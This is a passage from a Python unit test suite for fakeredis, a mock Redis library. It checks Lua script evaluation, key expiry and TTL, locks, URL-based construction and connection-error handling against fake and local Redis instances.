self.redis.set('foo', 'foo')
self.assertEqual(self.redis.ttl('foo'), -1)
def test_eval_set_value_to_arg(self):
self.redis.eval('redis.call("SET", KEYS[1], ARGV[1])', 1, 'foo', 'bar')
val = self.redis.get('foo')
self.assertEqual(val, b'bar')
def test_eval_conditional(self):
lua = """
local val = redis.call("GET", KEYS[1])
if val == ARGV[1] then
redis.call("SET", KEYS[1], ARGV[2])
else
redis.call("SET", KEYS[1], ARGV[1])
end
"""
self.redis.eval(lua, 1, 'foo', 'bar', 'baz')
val = self.redis.get('foo')
self.assertEqual(val, b'bar')
self.redis.eval(lua, 1, 'foo', 'bar', 'baz')
val = self.redis.get('foo')
self.assertEqual(val, b'baz')
def test_eval_table(self):
lua = """
local a = {}
a[1] = "foo"
a[2] = "bar"
a[17] = "baz"
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [b'foo', b'bar'])
def test_eval_table_with_nil(self):
lua = """
local a = {}
a[1] = "foo"
a[2] = nil
a[3] = "bar"
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [b'foo'])
def test_eval_table_with_numbers(self):
lua = """
local a = {}
a[1] = 42
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [42])
def test_eval_nested_table(self):
lua = """
local a = {}
a[1] = {}
a[1][1] = "foo"
return a
"""
val = self.redis.eval(lua, 0)
self.assertEqual(val, [[b'foo']])
def test_eval_iterate_over_argv(self):
lua = """
for i, v in ipairs(ARGV) do
end
return ARGV
"""
val = self.redis.eval(lua, 0, "a", "b", "c")
self.assertEqual(val, [b"a", b"b", b"c"])
def test_eval_iterate_over_keys(self):
lua = """
for i, v in ipairs(KEYS) do
end
return KEYS
"""
val = self.redis.eval(lua, 2, "a", "b", "c")
self.assertEqual(val, [b"a", b"b"])
def test_eval_mget(self):
self.redis.set('foo1', 'bar1')
self.redis.set('foo2', 'bar2')
val = self.redis.eval('return redis.call("mget", "foo1", "foo2")', 2, 'foo1', 'foo2')
self.assertEqual(val, [b'bar1', b'bar2'])
def test_eval_mget_none(self):
self.redis.set('foo1', None)
self.redis.set('foo2', None)
val = self.redis.eval('return redis.call("mget", "foo1", "foo2")', 2, 'foo1', 'foo2')
self.assertEqual(val, [b'None', b'None'])
def test_eval_mget_not_set(self):
val = self.redis.eval('return redis.call("mget", "foo1", "foo2")', 2, 'foo1', 'foo2')
self.assertEqual(val, [None, None])
def test_eval_hgetall(self):
self.redis.hset('foo', 'k1', 'bar')
self.redis.hset('foo', 'k2', 'baz')
val = self.redis.eval('return redis.call("hgetall", "foo")', 1, 'foo')
sorted_val = sorted([val[:2], val[2:]])
self.assertEqual(
sorted_val,
[[b'k1', b'bar'], [b'k2', b'baz']]
)
def test_eval_hgetall_iterate(self):
self.redis.hset('foo', 'k1', 'bar')
self.redis.hset('foo', 'k2', 'baz')
lua = """
local result = redis.call("hgetall", "foo")
for i, v in ipairs(result) do
end
return result
"""
val = self.redis.eval(lua, 1, 'foo')
sorted_val = sorted([val[:2], val[2:]])
self.assertEqual(
sorted_val,
[[b'k1', b'bar'], [b'k2', b'baz']]
)
def test_eval_list_with_nil(self):
self.redis.lpush('foo', 'bar')
self.redis.lpush('foo', None)
self.redis.lpush('foo', 'baz')
val = self.redis.eval('return redis.call("lrange", KEYS[1], 0, 2)', 1, 'foo')
self.assertEqual(val, [b'baz', b'None', b'bar'])
def test_eval_invalid_command(self):
with self.assertRaises(ResponseError):
self.redis.eval(
'return redis.call("FOO")',
0
)
def test_eval_syntax_error(self):
with self.assertRaises(ResponseError):
self.redis.eval('return "', 0)
def test_eval_runtime_error(self):
with self.assertRaises(ResponseError):
self.redis.eval('error("CRASH")', 0)
def test_eval_more_keys_than_args(self):
with self.assertRaises(ResponseError):
self.redis.eval('return 1', 42)
def test_eval_numkeys_float_string(self):
with self.assertRaises(ResponseError):
self.redis.eval('return KEYS[1]', '0.7', 'foo')
def test_eval_numkeys_integer_string(self):
val = self.redis.eval('return KEYS[1]', "1", "foo")
self.assertEqual(val, b'foo')
def test_eval_numkeys_negative(self):
with self.assertRaises(ResponseError):
self.redis.eval('return KEYS[1]', -1, "foo")
def test_eval_numkeys_float(self):
with self.assertRaises(ResponseError):
self.redis.eval('return KEYS[1]', 0.7, "foo")
def test_eval_global_variable(self):
# Redis doesn't allow script to define global variables
with self.assertRaises(ResponseError):
self.redis.eval('a=10', 0)
def test_eval_global_and_return_ok(self):
# Redis doesn't allow script to define global variables
with self.assertRaises(ResponseError):
self.redis.eval(
'''
a=10
return redis.status_reply("Everything is awesome")
''',
0
)
def test_eval_convert_number(self):
# Redis forces all Lua numbers to integer
val = self.redis.eval('return 3.2', 0)
self.assertEqual(val, 3)
val = self.redis.eval('return 3.8', 0)
self.assertEqual(val, 3)
val = self.redis.eval('return -3.8', 0)
self.assertEqual(val, -3)
def test_eval_convert_bool(self):
# Redis converts true to 1 and false to nil (which redis-py converts to None)
val = self.redis.eval('return false', 0)
self.assertIsNone(val)
val = self.redis.eval('return true', 0)
self.assertEqual(val, 1)
self.assertNotIsInstance(val, bool)
def test_eval_none_arg(self):
val = self.redis.eval('return ARGV[1] == "None"', 0, None)
self.assertTrue(val)
def test_eval_return_error(self):
with self.assertRaises(redis.ResponseError) as cm:
self.redis.eval('return {err="Testing"}', 0)
self.assertIn('Testing', str(cm.exception))
with self.assertRaises(redis.ResponseError) as cm:
self.redis.eval('return redis.error_reply("Testing")', 0)
self.assertIn('Testing', str(cm.exception))
def test_eval_return_ok(self):
val = self.redis.eval('return {ok="Testing"}', 0)
self.assertEqual(val, b'Testing')
val = self.redis.eval('return redis.status_reply("Testing")', 0)
self.assertEqual(val, b'Testing')
def test_eval_return_ok_nested(self):
val = self.redis.eval(
'''
local a = {}
a[1] = {ok="Testing"}
return a
''',
0
)
self.assertEqual(val, [b'Testing'])
def test_eval_return_ok_wrong_type(self):
with self.assertRaises(redis.ResponseError):
self.redis.eval('return redis.status_reply(123)', 0)
def test_eval_pcall(self):
val = self.redis.eval(
'''
local a = {}
a[1] = redis.pcall("foo")
return a
''',
0
)
self.assertIsInstance(val, list)
self.assertEqual(len(val), 1)
self.assertIsInstance(val[0], ResponseError)
def test_eval_pcall_return_value(self):
with self.assertRaises(ResponseError):
self.redis.eval('return redis.pcall("foo")', 0)
def test_eval_delete(self):
self.redis.set('foo', 'bar')
val = self.redis.get('foo')
self.assertEqual(val, b'bar')
val = self.redis.eval('redis.call("DEL", KEYS[1])', 1, 'foo')
self.assertIsNone(val)
def test_eval_exists(self):
val = self.redis.eval('return redis.call("exists", KEYS[1]) == 0', 1, 'foo')
self.assertEqual(val, 1)
def test_eval_flushdb(self):
self.redis.set('foo', 'bar')
val = self.redis.eval(
'''
local value = redis.call("FLUSHDB");
return type(value) == "table" and value.ok == "OK";
''', 0
)
self.assertEqual(val, 1)
def test_eval_flushall(self):
r1 = self.create_redis(db=0)
r2 = self.create_redis(db=1)
r1['r1'] = 'r1'
r2['r2'] = 'r2'
val = self.redis.eval(
'''
local value = redis.call("FLUSHALL");
return type(value) == "table" and value.ok == "OK";
''', 0
)
self.assertEqual(val, 1)
self.assertNotIn('r1', r1)
self.assertNotIn('r2', r2)
def test_eval_incrbyfloat(self):
self.redis.set('foo', 0.5)
val = self.redis.eval(
'''
local value = redis.call("INCRBYFLOAT", KEYS[1], 2.0);
return type(value) == "string" and tonumber(value) == 2.5;
''', 1, 'foo'
)
self.assertEqual(val, 1)
def test_eval_lrange(self):
self.redis.rpush('foo', 'a', 'b')
val = self.redis.eval(
'''
local value = redis.call("LRANGE", KEYS[1], 0, -1);
return type(value) == "table" and value[1] == "a" and value[2] == "b";
''', 1, 'foo'
)
self.assertEqual(val, 1)
def test_eval_ltrim(self):
self.redis.rpush('foo', 'a', 'b', 'c', 'd')
val = self.redis.eval(
'''
local value = redis.call("LTRIM", KEYS[1], 1, 2);
return type(value) == "table" and value.ok == "OK";
''', 1, 'foo'
)
self.assertEqual(val, 1)
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'b', b'c'])
def test_eval_lset(self):
self.redis.rpush('foo', 'a', 'b')
val = self.redis.eval(
'''
local value = redis.call("LSET", KEYS[1], 0, "z");
return type(value) == "table" and value.ok == "OK";
''', 1, 'foo'
)
self.assertEqual(val, 1)
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'z', b'b'])
def test_eval_sdiff(self):
self.redis.sadd('foo', 'a', 'b', 'c', 'f', 'e', 'd')
self.redis.sadd('bar', 'b')
val = self.redis.eval(
'''
local value = redis.call("SDIFF", KEYS[1], KEYS[2]);
if type(value) ~= "table" then
return redis.error_reply(type(value) .. ", should be table");
else
return value;
end
''', 2, 'foo', 'bar')
# Lua must receive the set *sorted*
self.assertEqual(val, [b'a', b'c', b'd', b'e', b'f'])
class TestFakeRedis(unittest.TestCase):
decode_responses = False
def setUp(self):
self.redis = self.create_redis()
def tearDown(self):
self.redis.flushall()
del self.redis
def assertInRange(self, value, start, end, msg=None):
self.assertGreaterEqual(value, start, msg)
self.assertLessEqual(value, end, msg)
def create_redis(self, db=0):
return fakeredis.FakeRedis(db=db)
def test_setex(self):
self.assertEqual(self.redis.setex('foo', 'bar', 100), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_setex_using_timedelta(self):
self.assertEqual(
self.redis.setex('foo', 'bar', timedelta(seconds=100)), True)
self.assertEqual(self.redis.get('foo'), b'bar')
def test_lrem_positive_count(self):
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'same')
self.redis.lpush('foo', 'different')
self.redis.lrem('foo', 'same', 2)
self.assertEqual(self.redis.lrange('foo', 0, -1), [b'different'])
def test_lrem_negative_count(self):
self.redis.lpush('foo', 'removeme')
self.redis.lpush('foo', 'three')
self.redis.lpush('foo', 'two')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'removeme')
self.redis.lrem('foo', 'removeme', -1)
# Should remove it from the end of the list,
# leaving the 'removeme' at the front of the list alone.
self.assertEqual(self.redis.lrange('foo', 0, -1),
[b'removeme', b'one', b'two', b'three'])
def test_lrem_zero_count(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_default_value(self):
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 'one')
self.assertEqual(self.redis.lrange('foo', 0, -1), [])
def test_lrem_does_not_exist(self):
self.redis.lpush('foo', 'one')
self.redis.lrem('foo', 'one')
# These should be noops.
self.redis.lrem('foo', 'one', -2)
self.redis.lrem('foo', 'one', 2)
def test_lrem_return_value(self):
self.redis.lpush('foo', 'one')
count = self.redis.lrem('foo', 'one', 0)
self.assertEqual(count, 1)
self.assertEqual(self.redis.lrem('foo', 'one'), 0)
def test_zadd_deprecated(self):
result = self.redis.zadd('foo', 'one', 1)
self.assertEqual(result, 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'one'])
def test_zadd_missing_required_params(self):
with self.assertRaises(redis.RedisError):
# Missing the 'score' param.
self.redis.zadd('foo', 'one')
with self.assertRaises(redis.RedisError):
# Missing the 'value' param.
self.redis.zadd('foo', None, score=1)
with self.assertRaises(redis.RedisError):
self.redis.zadd('foo')
def test_zadd_with_single_keypair(self):
result = self.redis.zadd('foo', bar=1)
self.assertEqual(result, 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'bar'])
def test_zadd_with_multiple_keypairs(self):
result = self.redis.zadd('foo', bar=1, baz=9)
self.assertEqual(result, 2)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'bar', b'baz'])
def test_zadd_with_name_is_non_string(self):
result = self.redis.zadd('foo', 1, 9)
self.assertEqual(result, 1)
self.assertEqual(self.redis.zrange('foo', 0, -1), [b'1'])
def test_set_nx_doesnt_set_value_twice(self):
self.assertEqual(self.redis.set('foo', 'bar', nx=True), True)
self.assertEqual(self.redis.set('foo', 'bar', nx=True), None)
def test_set_xx_set_value_when_exists(self):
self.assertEqual(self.redis.set('foo', 'bar', xx=True), None)
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.set('foo', 'bar', xx=True), True)
@attr('slow')
def test_set_ex_should_expire_value(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.set('foo', 'bar', ex=1)
sleep(2)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_set_px_should_expire_value(self):
self.redis.set('foo', 'bar', px=500)
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_psetex_expire_value(self):
with self.assertRaises(ResponseError):
self.redis.psetex('foo', 0, 'bar')
self.redis.psetex('foo', 500, 'bar')
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_psetex_expire_value_using_timedelta(self):
with self.assertRaises(ResponseError):
self.redis.psetex('foo', timedelta(seconds=0), 'bar')
self.redis.psetex('foo', timedelta(seconds=0.5), 'bar')
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
@attr('slow')
def test_expire_should_expire_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expire('foo', 1)
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
def test_expire_should_return_true_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.expire('foo', 1)
self.assertIs(rv, True)
def test_expire_should_return_false_for_missing_key(self):
rv = self.redis.expire('missing', 1)
self.assertIs(rv, False)
def test_expire_long(self):
self.redis.set('foo', 'bar')
self.redis.expire('foo', long(1))
@attr('slow')
def test_expire_should_expire_key_using_timedelta(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expire('foo', timedelta(seconds=1))
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
@attr('slow')
def test_expire_should_expire_immediately_with_millisecond_timedelta(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expire('foo', timedelta(milliseconds=750))
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
@attr('slow')
def test_pexpire_should_expire_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.pexpire('foo', 150)
sleep(0.2)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pexpire('bar', 1), False)
def test_pexpire_should_return_truthy_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.pexpire('foo', 1)
self.assertIs(bool(rv), True)
def test_pexpire_should_return_falsey_for_missing_key(self):
rv = self.redis.pexpire('missing', 1)
self.assertIs(bool(rv), False)
@attr('slow')
def test_pexpire_should_expire_key_using_timedelta(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.pexpire('foo', timedelta(milliseconds=750))
sleep(0.5)
self.assertEqual(self.redis.get('foo'), b'bar')
sleep(0.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pexpire('bar', 1), False)
@attr('slow')
def test_expireat_should_expire_key_by_datetime(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expireat('foo', datetime.now() + timedelta(seconds=1))
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expireat('bar', datetime.now()), False)
@attr('slow')
def test_expireat_should_expire_key_by_timestamp(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.expireat('foo', int(time() + 1))
sleep(1.5)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
def test_expireat_should_return_true_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.expireat('foo', int(time() + 1))
self.assertIs(rv, True)
def test_expireat_should_return_false_for_missing_key(self):
rv = self.redis.expireat('missing', int(time() + 1))
self.assertIs(rv, False)
@attr('slow')
def test_pexpireat_should_expire_key_by_datetime(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.pexpireat('foo', datetime.now() + timedelta(milliseconds=150))
sleep(0.2)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.pexpireat('bar', datetime.now()), False)
@attr('slow')
def test_pexpireat_should_expire_key_by_timestamp(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.redis.pexpireat('foo', int(time() * 1000 + 150))
sleep(0.2)
self.assertEqual(self.redis.get('foo'), None)
self.assertEqual(self.redis.expire('bar', 1), False)
def test_pexpireat_should_return_true_for_existing_key(self):
self.redis.set('foo', 'bar')
rv = self.redis.pexpireat('foo', int(time() * 1000 + 150))
self.assertIs(bool(rv), True)
def test_pexpireat_should_return_false_for_missing_key(self):
rv = self.redis.pexpireat('missing', int(time() * 1000 + 150))
self.assertIs(bool(rv), False)
def test_ttl_should_return_none_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.ttl('foo'), None)
def test_ttl_should_return_value_for_expiring_key(self):
self.redis.set('foo', 'bar')
self.redis.expire('foo', 1)
self.assertEqual(self.redis.ttl('foo'), 1)
self.redis.expire('foo', 2)
self.assertEqual(self.redis.ttl('foo'), 2)
# See https://github.com/antirez/redis/blob/unstable/src/db.c#L632
ttl = 1000000000
self.redis.expire('foo', ttl)
self.assertEqual(self.redis.ttl('foo'), ttl)
def test_pttl_should_return_none_for_non_expiring_key(self):
self.redis.set('foo', 'bar')
self.assertEqual(self.redis.get('foo'), b'bar')
self.assertEqual(self.redis.pttl('foo'), None)
def test_pttl_should_return_value_for_expiring_key(self):
d = 100
self.redis.set('foo', 'bar')
self.redis.expire('foo', 1)
self.assertInRange(self.redis.pttl('foo'), 1000 - d, 1000)
self.redis.expire('foo', 2)
self.assertInRange(self.redis.pttl('foo'), 2000 - d, 2000)
ttl = 1000000000
# See https://github.com/antirez/redis/blob/unstable/src/db.c#L632
self.redis.expire('foo', ttl)
self.assertInRange(self.redis.pttl('foo'),
ttl * 1000 - d,
ttl * 1000)
def test_ttls_should_always_be_long(self):
self.redis.set('foo', 'bar')
self.redis.expire('foo', 1)
self.assertTrue(type(self.redis.ttl('foo')) is long)
self.assertTrue(type(self.redis.pttl('foo')) is long)
def test_expire_should_not_handle_floating_point_values(self):
self.redis.set('foo', 'bar')
with self.assertRaisesRegexp(
redis.ResponseError, 'value is not an integer or out of range'):
self.redis.expire('something_new', 1.2)
self.redis.pexpire('something_new', 1000.2)
self.redis.expire('some_unused_key', 1.2)
self.redis.pexpire('some_unused_key', 1000.2)
def test_lock(self):
lock = self.redis.lock('foo')
lock.acquire()
self.assertTrue(self.redis.exists('foo'))
lock.release()
self.assertFalse(self.redis.exists('foo'))
with self.redis.lock('bar'):
self.assertTrue(self.redis.exists('bar'))
self.assertFalse(self.redis.exists('bar'))
class DecodeMixin(object):
decode_responses = True
def _round_str(self, x):
self.assertIsInstance(x, fakeredis.text_type)
return round(float(x))
def assertEqual(self, a, b, msg=None):
super(DecodeMixin, self).assertEqual(a, fakeredis._decode(b), msg)
def assertIn(self, member, container, msg=None):
super(DecodeMixin, self).assertIn(fakeredis._decode(member), container)
def assertItemsEqual(self, a, b):
super(DecodeMixin, self).assertItemsEqual(a, fakeredis._decode(b))
class TestFakeStrictRedisDecodeResponses(DecodeMixin, TestFakeStrictRedis):
def create_redis(self, db=0):
return fakeredis.FakeStrictRedis(db=db, decode_responses=True)
class TestFakeRedisDecodeResponses(DecodeMixin, TestFakeRedis):
def create_redis(self, db=0):
return fakeredis.FakeRedis(db=db, decode_responses=True)
@redis_must_be_running
class TestRealRedis(TestFakeRedis):
def create_redis(self, db=0):
return redis.Redis('localhost', port=6379, db=db)
@redis_must_be_running
class TestRealStrictRedis(TestFakeStrictRedis):
def create_redis(self, db=0):
return redis.StrictRedis('localhost', port=6379, db=db)
@redis_must_be_running
class TestRealRedisDecodeResponses(TestFakeRedisDecodeResponses):
def create_redis(self, db=0):
return redis.Redis('localhost', port=6379, db=db, decode_responses=True)
@redis_must_be_running
class TestRealStrictRedisDecodeResponses(TestFakeStrictRedisDecodeResponses):
def create_redis(self, db=0):
return redis.StrictRedis('localhost', port=6379, db=db, decode_responses=True)
class TestInitArgs(unittest.TestCase):
def test_can_accept_any_kwargs(self):
fakeredis.FakeRedis(foo='bar', bar='baz')
fakeredis.FakeStrictRedis(foo='bar', bar='baz')
def test_singleton(self):
r1 = fakeredis.FakeStrictRedis(singleton=False)
r2 = fakeredis.FakeStrictRedis(singleton=False)
r3 = fakeredis.FakeStrictRedis()
r4 = fakeredis.FakeStrictRedis()
r3.flushall()
r1.set('foo', 'bar')
r3.set('bar', 'baz')
self.assertIn('foo', r1)
self.assertNotIn('foo', r2)
self.assertNotIn('foo', r3)
self.assertIn('bar', r3)
self.assertIn('bar', r4)
self.assertNotIn('bar', r1)
def test_from_url(self):
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/0')
db.set('foo', 'bar')
self.assertEqual(db.get('foo'), b'bar')
def test_from_url_with_db_arg(self):
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/0')
db1 = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/1')
db2 = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/',
db=2)
db.set('foo', 'foo0')
db1.set('foo', 'foo1')
db2.set('foo', 'foo2')
self.assertEqual(db.get('foo'), b'foo0')
self.assertEqual(db1.get('foo'), b'foo1')
self.assertEqual(db2.get('foo'), b'foo2')
def test_from_url_db_value_error(self):
# On ValueError, the db number should default to 0
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/a')
self.assertEqual(db._db_num, 0)
def test_can_pass_through_extra_args(self):
db = fakeredis.FakeStrictRedis.from_url(
'redis://username:password@localhost:6379/0',
decode_responses=True)
db.set('foo', 'bar')
self.assertEqual(db.get('foo'), 'bar')
class TestImportation(unittest.TestCase):
def test_searches_for_c_stdlib_and_raises_if_missing(self):
"""
Verifies that fakeredis checks for multiple C library implementations
looking for a strtod implementation and that it fails fast when none
is found.
"""
import ctypes.util
# Patch manually since unittest.mock.patch is not available in old Python versions
old_find_library = ctypes.util.find_library
searched_libraries = set()
try:
ctypes.util.find_library = lambda library: searched_libraries.add(library)
with self.assertRaises(ImportError):
reload(fakeredis)
self.assertEqual(set(['c', 'msvcrt', 'System']), searched_libraries)
finally:
ctypes.util.find_library = old_find_library
reload(fakeredis)
class TestFakeStrictRedisConnectionErrors(unittest.TestCase):
def create_redis(self):
return fakeredis.FakeStrictRedis(db=0, connected=False)
def setUp(self):
self.redis = self.create_redis()
def tearDown(self):
del self.redis
def test_flushdb(self):
with self.assertRaises(redis.ConnectionError):
self.redis.flushdb()
def test_flushall(self):
with self.assertRaises(redis.ConnectionError):
self.redis.flushall()
def test_append(self):
with self.assertRaises(redis.ConnectionError):
self.redis.append('key', 'value')
self.assertEqual(self.redis._db, {}, 'DB should be empty')
def test_bitcount(self):
with self.assertRaises(redis.ConnectionError):
self.redis.bitcount('key', 0, 20)
def test_decr(self):
with self.assertRaises(redis.ConnectionError):
self.redis.decr('key', 2)
self.assertEqual(self.redis._db, {}, 'DB should be empty')
def test_exists(self):
with self.assertRaises(redis.ConnectionError):
self.redis.exists('key')
def test_expire(self):
with self.assertRaises(redis.ConnectionError):
self.redis.expire('key', 20)
def test_pexpire(self):
with self.assertRaises(redis.ConnectionError):
self.redis.pexpire('key', 20)
def test_echo(self):
with self.assertRaises(redis.ConnectionError):
self.redis.echo('value')
def test_get(self):
with self.assertRaises(redis.ConnectionError):
self.redis.get('key')
def test_getbit(self):
with self.assertRaises(redis.ConnectionError):
self.redis.getbit('key', 2)
def test_getset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.getset('key', 'value')
def test_incr(self):
with self.assertRaises(redis.ConnectionError):
self.redis.incr('key')
def test_incrby(self):
with self.assertRaises(redis.ConnectionError):
self.redis.incrby('key')
def test_incrbyfloat(self):
with self.assertRaises(redis.ConnectionError):
self.redis.incrbyfloat('key')
def test_keys(self):
with self.assertRaises(redis.ConnectionError):
self.redis.keys()
def test_mget(self):
with self.assertRaises(redis.ConnectionError):
self.redis.mget(['key1', 'key2'])
def test_mset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.mset(('key', 'value'))
def test_msetnx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.msetnx({'key': 'value'})
def test_persist(self):
with self.assertRaises(redis.ConnectionError):
self.redis.persist('key')
def test_rename(self):
self.redis.connected = True
self.redis.set('key1', 'value')
self.redis.connected = False
with self.assertRaises(redis.ConnectionError):
self.redis.rename('key1', 'key2')
self.redis.connected = True
self.assertTrue(self.redis.exists('key1'))
def test_watch(self):
with self.assertRaises(redis.ConnectionError):
self.redis.watch()
def test_unwatch(self):
with self.assertRaises(redis.ConnectionError):
self.redis.unwatch()
def test_eval(self):
with self.assertRaises(redis.ConnectionError):
self.redis.eval('', 0)
def test_lpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lpush('name', [1, 2])
def test_lrange(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lrange('name', 1, 5)
def test_llen(self):
with self.assertRaises(redis.ConnectionError):
self.redis.llen('name')
def test_lrem(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lrem('name', 2, 2)
def test_rpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpush('name', [1])
def test_lpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lpop('name')
def test_lset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lset('name', 1, 4)
def test_rpushx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpushx('name', 1)
def test_ltrim(self):
with self.assertRaises(redis.ConnectionError):
self.redis.ltrim('name', 1, 4)
def test_lindex(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lindex('name', 1)
def test_lpushx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.lpushx('name', 1)
def test_rpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpop('name')
def test_linsert(self):
with self.assertRaises(redis.ConnectionError):
self.redis.linsert('name', 'where', 'refvalue', 'value')
def test_rpoplpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.rpoplpush('src', 'dst')
def test_blpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.blpop('keys')
def test_brpop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.brpop('keys')
def test_brpoplpush(self):
with self.assertRaises(redis.ConnectionError):
self.redis.brpoplpush('src', 'dst')
def test_hdel(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hdel('name')
def test_hexists(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hexists('name', 'key')
def test_hget(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hget('name', 'key')
def test_hgetall(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hgetall('name')
def test_hincrby(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hincrby('name', 'key')
def test_hincrbyfloat(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hincrbyfloat('name', 'key')
def test_hkeys(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hkeys('name')
def test_hlen(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hlen('name')
def test_hset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hset('name', 'key', 1)
def test_hsetnx(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hsetnx('name', 'key', 2)
def test_hmset(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hmset('name', {'key': 1})
def test_hmget(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hmget('name', ['a', 'b'])
def test_hvals(self):
with self.assertRaises(redis.ConnectionError):
self.redis.hvals('name')
def test_sadd(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sadd('name', [1, 2])
def test_scard(self):
with self.assertRaises(redis.ConnectionError):
self.redis.scard('name')
def test_sdiff(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sdiff(['a', 'b'])
def test_sdiffstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sdiffstore('dest', ['a', 'b'])
def test_sinter(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sinter(['a', 'b'])
def test_sinterstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sinterstore('dest', ['a', 'b'])
def test_sismember(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sismember('name', 20)
def test_smembers(self):
with self.assertRaises(redis.ConnectionError):
self.redis.smembers('name')
def test_smove(self):
with self.assertRaises(redis.ConnectionError):
self.redis.smove('src', 'dest', 20)
def test_spop(self):
with self.assertRaises(redis.ConnectionError):
self.redis.spop('name')
def test_srandmember(self):
with self.assertRaises(redis.ConnectionError):
self.redis.srandmember('name')
def test_srem(self):
with self.assertRaises(redis.ConnectionError):
self.redis.srem('name')
def test_sunion(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sunion(['a', 'b'])
def test_sunionstore(self):
with self.assertRaises(redis.ConnectionError):
self.redis.sunionstore('dest', ['a', 'b'])
def test_zadd(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zadd('name')
def test_zcard(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zcard('name')
def test_zcount(self):
with self.assertRaises(redis.ConnectionError):
self.redis.zcount('name', 1, 5)
def test_zincrby(self):
with self.assertRaises(redis.ConnectionError):
